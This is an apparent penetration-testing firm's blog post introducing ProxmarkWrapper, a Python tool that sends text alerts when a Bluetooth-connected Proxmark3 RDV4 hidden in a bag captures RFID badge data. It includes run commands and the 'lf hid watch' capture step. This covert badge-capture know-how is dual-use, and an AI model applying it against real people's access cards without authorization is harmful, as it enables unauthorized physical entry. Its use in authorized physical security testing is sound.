29 June 2020
In this post, we'll go over creating a more covert application for the Proxmark3 using the BlueTooth module we installed previously along with some ideas for masking your actions. One thing to note is that this post is based on my personal and professional experience using previous versions of the Proxmark3 as well as the RDV4.
If you haven't seen our previous posts about setting up the Proxmark3 with a clean Kali image and installing the battery/BlueTooth module check them out.
Generally, when on a physical penetration test or social engineering engagement where you may want to capture RFID cards you'll also want to ensure everything you do is proving fruitful. In this instance, it comes in the form of capturing legitimate RFID card information. With previous versions of the Proxmark3, this usually involved connecting the proxmark to a running computer inside a bag where any captured cards were printed to the terminal window; or using the on-board memory to house any captured cards. Of course there were more creative ways around this such as SSHing into the computer. But generally, both of these applications proved difficult to actively monitor any captured cards without the use of some sort of SSH connection or connecting to a server that data was posted to. Well, what if we could get a text everytime a new card was captured?
With the release of the Proxmark RDV4, the setup process and subsequent execution have become much easier and the barrier for entry has decreased with relation to covert operations. If you're using the Proxmark3 I'd highly recommend upgrading to the RDV4 due to the vast improvements in size and antenna components.
Introducing ProxmarkWrapper (found here: https://github.com/FortyNorthSecurity/ProxmarkWrapper), a simple Python wrapper application that will text the operator when a few different actions occur. The script will text you if:
Here's an example of what you could see when running and capturing new cards (you should only receive a text per unique card number once).
To get things started, we'll be working with the Proxmark3 RDV4 along with the BlueTooth/battery module; so the initial step will be to power it on. Note: We'll be mainly using a Mac for testing but the steps and script can easily be modified for other operating systems.
To use the wrapper program first connect the Proxmark3 to your computer via BlueTooth. If you're having issues connecting on Mac, see this and make sure the BT add-on support is present when the client is run:
Before running proxmarkWrapper.py just be sure to modify the first couple lines of code with your Gmail email address (I suggest a throwaway), Gmail password, and an email or phone number(s) to send the messages to.
If you're using a Kali VM, the only way I was able to fully get it to work was with a BlueTooth adapter and the connection wasn't great at times. Admittedly, I'm not great at debugging the BT communication protocol and tools so input would be great here from the community. If you run into issues, see this, as I had to reference that page a few times. Once you get connected via BT, you should see something similar to this:
If connecting over BT and on Linux, use the following - where the MAC address corresponds with your Proxmark3 RDV4's MAC address. Also be sure to keep "bt:" before your MAC address:
./proxmarkWrapper.py -l bt:aa:bb:cc:dd:ee:ff
If connecting over BT on Mac, just use the following (it should be the same on your system)
./proxmarkWrapper.py -l /dev/tty.PM3_RDV40-DevB
Once it's running and everything looks good you should have received a text message when the proxmark client is running and ready to capture cards. If you push the button once (usually cancels the capturing) it will rerun the capture command "lf hid watch". If the button is **pressed a second time, the program will send another text alerting the user and close gracefully.
While ProxmarkWrapper isn't anything new or some new breakthrough, I thought it would be kind of a cool take on capturing RFID cards for physical engagements in a more covert manner while being able to see when a card was captured. All this without the need to SSH into the system running the client.